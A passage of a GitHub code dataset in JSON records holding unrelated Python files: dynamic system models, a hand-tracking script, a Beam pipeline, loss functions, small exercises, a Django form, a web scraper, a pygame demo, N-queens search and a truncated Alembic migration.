np.ndarray,\n u: np.ndarray,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : np.ndarray\n Input array.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. 
Each timestep is one row.\n \"\"\"\n t = np.arange(*t_range, t_step)\n x = np.empty((t.shape[0], x0.shape[0]))\n x[0, :] = x0\n for k in range(1, t.shape[0]):\n x[k, :] = self.f(t[k - 1], x[k - 1, :], u[k - 1])\n return (t, x)\n\n\nclass MassSpringDamper(ContinuousDynamicModel):\n \"\"\"Mass-spring-damper model.\n\n State is ``[position, velocity]``.\n\n Examples\n --------\n Simulate a mass-spring-damper\n\n >>> msd = pykoop.dynamic_models.MassSpringDamper(0.5, 0.7, 0.6)\n >>> x0 = np.array([1, 0])\n >>> t, x = msd.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass: float, stiffness: float, damping: float) -> None:\n \"\"\"Instantiate :class:`MassSpringDamper`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n stiffness : float\n Stiffness (N/m).\n damping : float\n Viscous damping (N.s/m).\n \"\"\"\n self.mass = mass\n self.stiffness = stiffness\n self.damping = damping\n\n @property\n def A(self):\n \"\"\"Compute ``A`` matrix.\"\"\"\n A = np.array([\n [0, 1],\n [-self.stiffness / self.mass, -self.damping / self.mass],\n ])\n return A\n\n @property\n def B(self):\n \"\"\"Compute ``B`` matrix.\"\"\"\n B = np.array([\n [0],\n [1 / self.mass],\n ])\n return B\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = (self.A @ np.reshape(x, (-1, 1))\n + self.B @ np.reshape(u, (-1, 1)))\n return np.ravel(x_dot)\n\n\nclass Pendulum(ContinuousDynamicModel):\n \"\"\"Point-mass pendulum with optional damping.\n\n State is ``[angle, angular_velocity]``.\n\n Examples\n --------\n Simulate a pendulum\n\n >>> pend = pykoop.dynamic_models.Pendulum(0.5, 1, 0.6)\n >>> x0 = np.array([np.pi / 2, 0])\n >>> t, x = pend.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass, length, damping=0):\n \"\"\"Instantiate :class:`Pendulum`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n length : float\n Length (m).\n damping : float\n Viscous damping (N.m.s/rad).\n \"\"\"\n self.mass = mass\n self.length = length\n self.damping = damping\n\n def f(self, t, x, u):\n # noqa: D102\n theta, theta_dot = x\n x_dot = np.array([\n theta_dot,\n (-self.damping / self.mass / self.length**2 * theta_dot\n - constants.g / self.length * np.sin(theta)),\n ]) + np.array([\n 0,\n 1 / (self.mass * self.length**2),\n ]) * u\n return x_dot\n\n\nclass DuffingOscillator(ContinuousDynamicModel):\n r\"\"\"Duffing oscillator model.\n\n Equation is ``\\ddot{x} + \\delta \\dot{x} + \\beta x + \\alpha x^3 = u(t)``\n where usually ``u(t) = a \\cos(\\omega t)``.\n \"\"\"\n\n def __init__(\n self,\n alpha: float = 1,\n beta: float = -1,\n delta: float = 0.1,\n ) -> None:\n \"\"\"Instantiate :class:`DuffingOscillator`.\n\n Parameters\n ----------\n alpha : float\n Coefficient of cubic term.\n beta : float\n Coefficient of linear term.\n delta : float\n Coefficient of first derivative.\n \"\"\"\n self.alpha = alpha\n self.beta = beta\n self.delta = delta\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray):\n # noqa: D102\n x_dot = np.array([\n x[1],\n u - self.delta * x[1] - self.beta * x[0] - self.alpha * x[0]**3\n ])\n return x_dot\n\n\nclass DiscreteVanDerPol(DiscreteDynamicModel):\n \"\"\"Van der Pol oscillator.\n\n Examples\n --------\n Simulate Van der Pol oscillator\n\n >>> t_step = 0.1\n >>> vdp = pykoop.dynamic_models.DiscreteVanDerPol(t_step, 2)\n >>> x0 = np.array([1, 0])\n >>> t_range = (0, 10)\n >>> u = 0.01 * np.cos(np.arange(*t_range, t_step))\n >>> t, x = vdp.simulate(t_range, t_step, x0, u)\n \"\"\"\n\n def __init__(self, t_step: float, 
mu: float) -> None:\n \"\"\"Instantiate :class:`DiscreteVanDerPol`.\n\n Parameters\n ----------\n t_step : float\n Timestep (s)\n mu : float\n Strength of nonlinearity.\n \"\"\"\n self.t_step = t_step\n self.mu = mu\n\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n # noqa: D102\n x_next = x + self.t_step * np.array(\n [x[1], self.mu * (1 - x[0]**2) * x[1] - x[0] + u])\n return x_next\n","repo_name":"decargroup/pykoop","sub_path":"pykoop/dynamic_models.py","file_name":"dynamic_models.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"}
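# Editor's note: a minimal sketch (not part of pykoop) showing how a
# continuous-time model from the file above could be wrapped as a
# discrete-time one with a forward-Euler step, mirroring the update used in
# DiscreteVanDerPol.f; `EulerWrapper` is a hypothetical name for illustration.
class EulerWrapper(DiscreteDynamicModel):

    def __init__(self, ct_model: ContinuousDynamicModel, t_step: float) -> None:
        self.ct_model = ct_model
        self.t_step = t_step

    def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:
        # x_{k+1} = x_k + dt * f_c(t_k, x_k, u_k)
        return x + self.t_step * self.ct_model.f(t, x, u)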
+{"seq_id":"3890310635","text":"import cv2\nimport mediapipe as mp\n\nmp_hand = mp.solutions.hands\nhands = mp_hand.Hands()\nmp_drawing_utils = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n success, img = cap.read()\n if not success:\n break\n result = hands.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n if result.multi_hand_landmarks:\n for hand_landmark in result.multi_hand_landmarks:\n mp_drawing_utils.draw_landmarks(\n img,\n hand_landmark,\n mp_hand.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style()\n )\n for id_landmark, landmark in enumerate(hand_landmark.landmark):\n print(id_landmark, landmark)\n if id_landmark == 0:\n h, w, c = img.shape\n print(h, w)\n cx_0, cy_0 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 1:\n h, w, c = img.shape\n cx_1, cy_1 = int(landmark.x*w), int(landmark.y * h)\n elif id_landmark == 9:\n h, w, c = img.shape\n cx_9, cy_9 = int(landmark.x * w), int(landmark.y * h)\n elif id_landmark == 17:\n h, w, c = img.shape\n cx_17, cy_17 = int(landmark.x * w), int(landmark.y * h)\n\n cv2.line(img, (cx_0, cy_0), (cx_9, cy_9), (255, 0, 0), 5)\n cv2.line(img, (cx_1, cy_1), (cx_17, cy_17), (255, 0, 0), 5)\n\n\n\n # print(result.multi_hand_landmarks)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"jsli96/ramp1.4_mega2560","sub_path":"haptic-device_mega2560/hand_rec_cv.py","file_name":"hand_rec_cv.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"86748210456","text":"import apache_beam as beam\nfrom apache_beam.options.pipeline_options import (PipelineOptions, SetupOptions) \nimport argparse\n\nOUTPUT_SCHEMA = \"bestdeviceid:STRING, bestdeviceidtype:STRING, offerlevel:INTEGER, score:FLOAT, timestamp:TIMESTAMP\" \n\nOFFERLEVELS = [645570,640602,652131,640737,643902,649216,31454,633602,622270,636785]\n\ndef map_to_dict(x):\n \"\"\n return {\n 'bestdeviceid':x['bestdeviceid'], \n 'bestdeviceidtype':x['bestdeviceidtype'],\n 'offerlevel': x['offerlevel'],\n 'score':x['score'],\n 'timestamp':x['timestamp']}\n\n\nclass ModelInference(beam.DoFn):\n\n def __init__(self, offerlevel_id):\n \n import datetime\n from google.cloud import storage\n import joblib\n \n self._dt = datetime\n \n self._offerlevel = offerlevel_id\n self._bucket = 'pjm-sklearn-models'\n self._filename = f\"ol{offerlevel_id}.joblib\"\n \n _bucket = storage.Client().get_bucket(self._bucket)\n _blob = _bucket.blob(self._filename)\n \n # download to local\n _blob.download_to_filename(self._filename)\n self.model = joblib.load(self._filename)\n\n\n def process(self, element):\n \n pred = self.model.predict_proba([element['visitdata']])[:,1]\n \n return [{\n 'bestdeviceid':element['bestdeviceid'],\n 'bestdeviceidtype':element['bestdeviceidtype'],\n 'offerlevel':int(self._offerlevel),\n 'score':pred[0],\n 'timestamp':self._dt.datetime.now().isoformat()\n }]\n\n\ndef run(argv=None, save_main_session=True):\n\n parser = argparse.ArgumentParser()\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n pipeline_options = PipelineOptions(pipeline_args)\n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n\n with beam.Pipeline(options=pipeline_options) as p:\n source_data = (p \n | 'QueryTable' >> beam.io.Read(\n beam.io.BigQuerySource(\n query=\"\"\"\n select *\n from [dst-mlpipes:pjm_visitdata_sample.universe]\n limit 1000000\n \"\"\")\n )\n )\n\n inferences = []\n for offerlevel in OFFERLEVELS:\n inferences.append(source_data \n | f'Perform Inference OL {offerlevel}' >> beam.ParDo(ModelInference(offerlevel)))\n\n outputs = (\n tuple(inferences)\n | 'Combine outputs' >> beam.Flatten()\n # | 'Map to necessary structure' >> beam.Map(map_to_dict)\n | 'Write' >> beam.io.WriteToBigQuery(\n table='scoring_output',\n dataset='pjm_visitdata_sample',\n project='dst-mlpipes',\n schema=OUTPUT_SCHEMA)\n )\n\nif __name__ == '__main__':\n run()","repo_name":"pmccarthy-dstillery/tfxtesting","sub_path":"dataflow_scoring/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2256081934","text":"import numpy as np\r\n\r\ndef global_connectivity(nb_neurons,probability):\r\n all_neurons_id = np.arange(0,nb_neurons)\r\n all_i = np.repeat(all_neurons_id,nb_neurons)\r\n all_j = np.tile(all_neurons_id,nb_neurons)\r\n chozen_connections = np.random.choice(np.arange(0,nb_neurons**2),int((nb_neurons**2)*probability),replace=False)\r\n i_connect = all_i[chozen_connections]\r\n j_connect = all_j[chozen_connections]\r\n return i_connect,j_connect\r\n\r\ndef strength_assembly(neuron_pool,i_connect,j_connect,prev_strengths,inside_strength):\r\n\r\n new_strengths = prev_strengths\r\n\r\n for i_id in range(len(i_connect)):\r\n i= i_connect[i_id]\r\n j=j_connect[i_id]\r\n if i in neuron_pool and j in neuron_pool:\r\n new_strengths[i_id] = inside_strength\r\n\r\n return new_strengths","repo_name":"Saighi/SelfHealingNetwork","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71703622763","text":"import torch\nimport torch.nn as nn\n\n\nclass CE:\n def __init__(self, model):\n self.model = model\n self.ce = nn.CrossEntropyLoss()\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n labels = labels.view(-1).long()\n loss = self.ce(outputs, labels)\n return loss\n\n\nclass BCE:\n def __init__(self, model):\n self.model = model\n self.bce = nn.BCELoss(reduction='none')\n\n def compute(self, batch):\n seqs, labels = batch\n outputs = self.model(seqs) # B * N\n weight = torch.ones(outputs.shape[0]).float().to(outputs.device)\n loss = self.bce(outputs.view(-1), labels.float())\n loss = torch.mean(weight * loss)\n return loss\n","repo_name":"icantnamemyself/FormerTime","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"73950601002","text":"#coding=utf-8\n__author__ = 'xuxuan'\nclass Solution(object):\n _numsToRoman=[\n ['','I','II','III','IV','V','VI','VII','VIII','IX','X'],\n ['','X','XX','XXX','XL','L','LX','LXX','LXXX','XC','C'],\n ['','C','CC','CCC','CD','D','DC','DCC','DCCC','CM','M'],\n ['','M','MM','MMM'],\n ]\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n s='0'*(4-len(str(num)))+str(num)\n ntr=self._numsToRoman\n return ntr[3][int(s[0])]+ntr[2][int(s[1])]+ntr[1][int(s[2])]+ntr[0][int(s[3])]","repo_name":"corpsepiges/leetcode","sub_path":"python/012. Integer to Roman.py","file_name":"012. Integer to Roman.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"19"}
+{"seq_id":"37336729604","text":"# ================= Atmospheric CO2 Emissions ===================\r\n\r\n#This program is to show the growth of CO2 Emissions since 1960, when the Mauna Loa records began being published.\r\n#The data has been retrieved and copied from the following website: https://climate.nasa.gov/vital-signs/carbon-dioxide/\r\n# where the data can be downloaded and viewed.\r\n#The objective of this is to show how polynomial regression can look in relation to linear regression.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\n# Training set\r\nx_line = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year.\r\ny_line = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Testing set\r\nx_poly = [[1960], [1965], [1970], [1975], [1980], [1985], [1990], [1995], [2000], [2005], [2010], [2015],\r\n [2020]] # Year\r\ny_poly = [[316.19], [319.42], [325.13], [330.59], [338.32], [345.88], [354.33], [360.68], [369.67], [380.11], [389.79],\r\n [401.85], [412.43]] # CO2 PPM\r\n\r\n# Train the Linear Regression model and plot a prediction\r\nregressor = LinearRegression()\r\nregressor.fit(x_line, y_line)\r\nxx = np.linspace(1950, 2020, 10)\r\nyy = regressor.predict(xx.reshape(xx.shape[0], 1))\r\nplt.plot(xx, yy)\r\n\r\n# Set the degree of the Polynomial Regression model\r\nquadratic_degree = PolynomialFeatures(degree=2)\r\n\r\n# This preprocessor transforms an input data matrix into a new data matrix of a given degree\r\nx_train_quadratic = quadratic_degree.fit_transform(x_line)\r\nx_test_quadratic = quadratic_degree.transform(x_poly)\r\n\r\n# Train and test the regressor_quadratic model\r\nregressor_quadratic = LinearRegression()\r\nregressor_quadratic.fit(x_train_quadratic, y_line)\r\nxx_quadratic = quadratic_degree.transform(xx.reshape(xx.shape[0], 1))\r\n\r\n# Plot the graph\r\nplt.plot(xx, regressor_quadratic.predict(xx_quadratic), c='r', linestyle='--')\r\nplt.title('Atmospheric Carbon Dioxide Emissions Over 60 Years')\r\nplt.xlabel('Year')\r\nplt.ylabel('CO2 Emissions in Parts Per Million(PPM)')\r\nplt.axis([1950, 2020, 310, 420])\r\nplt.grid(True)\r\nplt.scatter(x_line, y_line)\r\nplt.show()\r\nprint(x_line)\r\nprint(x_train_quadratic)\r\nprint(x_poly)\r\nprint(x_test_quadratic)\r\n\r\n# If you execute the code, you will see that the simple linear regression model is plotted with\r\n# a solid line. The quadratic regression model is plotted with a dashed line and evidently\r\n# the quadratic regression model fits the training data slightly better.\r\n","repo_name":"Bmk19/Atmospheric_CO2Emissions","sub_path":"AtmosphericCO2.py","file_name":"AtmosphericCO2.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71476930922","text":"# Chapter 7, programming exercise 3\n# This program calculates the corresponding \n# grade of an exam score. \n\ndef main():\n print(\"This program will calculate the corresponding grade of an exam score.\\n\")\n try:\n examScore = int(input(\"Enter your exam score: \"))\n except NameError:\n print(\"Please enter a valid number between 0 and 100.\")\n except TypeError:\n print(\"Please enter a valid number between 0 and 100.\")\n except ValueError:\n print(\"Please enter a valid number between 0 and 100.\") \n\n\n if 100 > examScore >= 90:\n grade = \"A\"\n elif 90 > examScore >= 80:\n grade = \"B\"\n elif 80 > examScore >= 70:\n grade = \"C\"\n elif 70 > examScore >= 60:\n grade = \"D\"\n elif 60 > examScore:\n grade = \"F\"\n else:\n print(\"Please enter a valid number between 0 and 100.\")\n \n\n print(\"The corresponding grade of your exam score is \", grade, \".\")\n\nif __name__ == '__main__':\n main()","repo_name":"dashaevsina/HW070172","sub_path":"L05/Chapter 7 Programming exercise 3).py","file_name":"Chapter 7 Programming exercise 3).py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2464169476","text":"from django.contrib.auth.forms import UserCreationForm\n\nfrom django.db import transaction\nfrom django import forms\nfrom .models import User,ReaderProfile,AuthorProfile\nchoise = ((\"READER\",\"Reader\"),(\"AUTHOR\",\"Author\"))\nclass SignupForm(UserCreationForm):\n role = forms.ChoiceField(choices=choise)\n class Meta(UserCreationForm.Meta):\n model = User\n fields = [\"username\",\"email\",\"role\"]\n \n @transaction.atomic\n def save(self):\n user = super().save(commit=False)\n user.role = self.cleaned_data.get('role')\n # if(\"READER\" in self.cleaned_data.get('role')):\n # user.role = (\"READER\",'Reader')\n # else:\n # user.role = (\"AUTHOR\",'Author')\n user.save()\n if(user.role == \"READER\"):\n reader = ReaderProfile.objects.create(user=user)\n reader.save()\n \n elif(user.role == \"AUTHOR\"):\n author = AuthorProfile.objects.create(user=user)\n author.save()\n return user\n","repo_name":"adel5555/libsys","sub_path":"user/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"3771861795","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef melon():\n url = 'https://www.melon.com/chart/'\n header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'}\n result = requests.get(url, headers=header)\n soup = BeautifulSoup(result.text, 'html.parser')\n trs = soup.select('#lst50')\n line = []\n for tr in trs:\n rank = tr.select_one('.wrap.t_center').get_text().split('\\n')\n img= 'https:' + tr.select_one('td > div > a> img')['src']\n title = tr.select_one('.ellipsis.rank01>span>a').get_text().split('\\n')\n artist = tr.select_one('.ellipsis.rank02>span>a').get_text()\n song = tr.select_one('.ellipsis.rank03>a').get_text().split('\\n')\n line.append({'순위':rank,'albumImage':img, '곡명':title,'가수':artist,'앨범':song})\n\n return line","repo_name":"qomalq/DataAnalysis-Lecture","sub_path":"07.FlaskWeb/melon_unity.py","file_name":"melon_unity.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"33737340135","text":"import pygame\r\nimport random\r\n\r\n# Color List\r\nBLACK = ( 0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\nclass Block(pygame.sprite.Sprite):\r\n \"\"\"\r\n Class for ball.\r\n Derives from the \"Sprite\" class in Pygame.\r\n \"\"\"\r\n\r\n def __init__(self, color, width, height):\r\n \"\"\" Constructor: pass in color and x/y position\r\n \"\"\"\r\n\r\n # Call the parent class\r\n super().__init__()\r\n\r\n # Create an image of the block and fill with a color\r\n # Can also be an image\r\n self.image = pygame.Surface([width, height])\r\n self.image.fill(color)\r\n\r\n # Fetch rect that has dimensions of the image\r\n\r\n # Update position of this object by setting values\r\n # of rect.x and rect.y\r\n self.rect = self.image.get_rect()\r\n\r\n def reset_pos(self):\r\n \"\"\" Reset position to the top of the screen at random x location.\r\n Called by update() or main program loop if collision.\r\n \"\"\"\r\n self.rect.y = random.randrange(-300, -20)\r\n self.rect.x = random.randrange(0, screen_width)\r\n\r\n def update(self):\r\n \"\"\" Called each frame.\"\"\"\r\n\r\n # Move block down one pixel\r\n self.rect.y += 1\r\n if self.rect.y > screen_height:\r\n self.reset_pos()\r\n\r\n# Initialize Pygame\r\npygame.init()\r\n\r\n# Set height and width of the screen\r\nscreen_width = 700\r\nscreen_height = 400\r\nscreen = pygame.display.set_mode([screen_width, screen_height])\r\n\r\n# List of Sprites.\r\n# Each block in program is added to this list.\r\n# List is managed by class called 'Group.'\r\nblock_list = pygame.sprite.Group()\r\n\r\n# This is a list of every sprite:\r\n# All blocks and the player block as well.\r\nall_sprites_list = pygame.sprite.Group()\r\n\r\nfor i in range(50):\r\n # This represents a block\r\n block = Block(BLACK, 20, 15)\r\n\r\n # Set a random location for the block\r\n block.rect.x = random.randrange(screen_width)\r\n block.rect.y = random.randrange(screen_height)\r\n\r\n # Add the block to the list of objects\r\n block_list.add(block)\r\n all_sprites_list.add(block)\r\n\r\n# Create a RED player block\r\nplayer = Block(RED, 20, 15)\r\nall_sprites_list.add(player)\r\n\r\n# Loop until user closes window\r\ndone = False\r\n\r\n# Manage how fast screen updates\r\nclock = pygame.time.Clock()\r\n\r\n# Hide mouse cursor\r\npygame.mouse.set_visible(0)\r\n\r\nscore = 0\r\n\r\n# -------- Main Program Loop ---------\r\nwhile not done:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n\r\n # Clear the screen\r\n screen.fill(WHITE)\r\n\r\n # Get current position of mouse\r\n pos = pygame.mouse.get_pos()\r\n\r\n # Fetch the x/y coordinates\r\n player.rect.x = pos[0]\r\n player.rect.y = pos[1]\r\n\r\n # Call update() method for all blocks in block_list\r\n block_list.update()\r\n\r\n # Check if player blocks has collided with other blocks\r\n blocks_hit_list = pygame.sprite.spritecollide(player, block_list, False)\r\n\r\n # Check the list of collisions\r\n for block in blocks_hit_list:\r\n score += 1\r\n print(score)\r\n\r\n block.reset_pos()\r\n if score == 100:\r\n print(\"C O N G R A T U L A T I O N S\")\r\n done = True\r\n\r\n # Draw all sprites\r\n all_sprites_list.draw(screen)\r\n\r\n # Limit to 60 frames per second\r\n clock.tick(60)\r\n\r\n # Update screen\r\n 
pygame.display.flip()\r\n\r\npygame.quit()","repo_name":"allenmattp/Arcade","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"12207373683","text":"import random\nimport heapq\nimport sys\n\nsys.setrecursionlimit(10000)\n\n\nclass State:\n def __init__(self, queens, steps=0):\n self.queens = queens\n self.gn = steps\n\n def __lt__(self, other):\n return self.gn < other.gn\n\n def __hash__(self):\n return hash(tuple(self.queens))\n\n def __eq__(self, other):\n if isinstance(other, State):\n return self.queens == other.queens\n return False\n @staticmethod\n def random_state(n):\n if not isinstance(n, int):\n raise TypeError(\"n must be an integer\")\n queens = [random.randint(1, n) for _ in range(n)]\n return State(queens)\n\n def IsGoal(self):\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n return False\n return True\n\n def SuccessorFunction(self):\n states = set()\n n = len(self.queens)\n for i in range(n):\n for j in range(1, n + 1):\n if j != self.queens[i]:\n new_queens = list(self.queens)\n new_queens[i] = j\n successor_state = State(new_queens, self.gn + 1)\n states.add(successor_state)\n return list(states)\n\n def heuristic(self):\n attacks = 0\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n attacks += 1\n return attacks\n\n def cost(self):\n return self.gn\n\n\ndef BFS(initial_state):\n steps = 0\n FIFO = [(initial_state, 0)]\n visited = {initial_state}\n search_cost = 0\n max_fringe_size = 1\n\n while FIFO:\n state, steps = FIFO.pop(0)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n FIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(FIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef DFS(initial_state):\n LIFO = [(initial_state, 0)]\n visited = {initial_state}\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while LIFO:\n state, steps = LIFO.pop()\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n LIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(LIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef greedy(initial_state):\n heap = [(initial_state.heuristic(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef Astar(initial_state):\n heap = [(initial_state.heuristic() + initial_state.cost(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in 
visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic() + successor_state.cost(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef PrintBoard(queens):\n n = len(queens)\n for i in range(n):\n print(' ---' * n)\n for j in range(1, n + 1):\n p = 'Q' if queens[i] == j else ' '\n print('| %s ' % p, end='')\n print('|')\n print(' ---' * n)\n\ndef printinfo(steps, search_cost, max_fringe_size):\n print(\"Total number of steps to reach a solution (solution cost):\", steps)\n print(\"Total number of nodes generated before reaching a solution (search cost):\", search_cost)\n print(\"Maximum size of the fringe:\", max_fringe_size)\n","repo_name":"1hexk/N-Queen-Problem","sub_path":"N_queen_problem.py","file_name":"N_queen_problem.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
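# Editor's note: a minimal driver sketch for the classes above; the board size
# and the choice of A* are illustrative, not part of the original file.
if __name__ == '__main__':
    initial = State.random_state(6)
    goal, steps, search_cost, max_fringe = Astar(initial)
    if goal is not None:
        PrintBoard(goal.queens)
        printinfo(steps, search_cost, max_fringe)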
+{"seq_id":"7806140946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017-12-20\n@author: whenever77\nubuntu 14\n\n在训练过程中显示loss图像并进行保存\n\nloss文件格式如下(每行一个值):\n4.578215\n3.984914\n……\n3.718668\n\n使用以下命令运行:\npython show_loss.py '/home/data/pytorch_out/'\n\npng保存形式为 loss_month_day_hours_minutes.png\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport time\nimport sys\n\n\n# dir 为训练目录,即loss.txt所在目录,直接修改为所需路径即可\ndir = \"/home/data/pytorch_out/\"\n\n\n# 如读入有参数,即sys.argv[1]有值\nif len(sys.argv) >= 2:\n try:\n print(\"--------------------------------\")\n print(sys.argv[1].split('/')[-2])\n print(\"--------------------------------\")\n dir = sys.argv[1]\n except BaseException as e:\n print('error:\\t')\n print(e)\nelse:\n print(\"--------------------------------\")\n print(dir.split('/')[-2])\n print(\"--------------------------------\")\n\n\t\n\t\n# 读取loss的路径\npath = os.path.join(dir, 'loss.txt')\n\n# 利用时间作为画图后缀。可在训练过程中随时记录loss图像\ntime_tmp = list(time.localtime())[1:5]\ntime_now = \"_\".join(str(i) for i in time_tmp)\n\n# 如路径有误,print error\ntry:\n dataloss = np.loadtxt(path)\n plt.plot(dataloss)\n save_path = str(dir) + 'loss_' + str(time_now) + '.png'\n plt.savefig(save_path)\n plt.show()\nexcept BaseException as e:\n # print(\"--------------------------------\")\n print('error:\\t')\n print(e)\n\n","repo_name":"whenever77/Python-study","sub_path":"show_loss.py","file_name":"show_loss.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"1900205692","text":"\"\"\"empty message\n\nRevision ID: 3a24472d1754\nRevises: 762402052503\nCreate Date: 2021-04-08 04:13:23.757308\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '3a24472d1754'\ndown_revision = '762402052503'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('personajes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('planetas',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('usuarios',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=120), nullable=False),\n 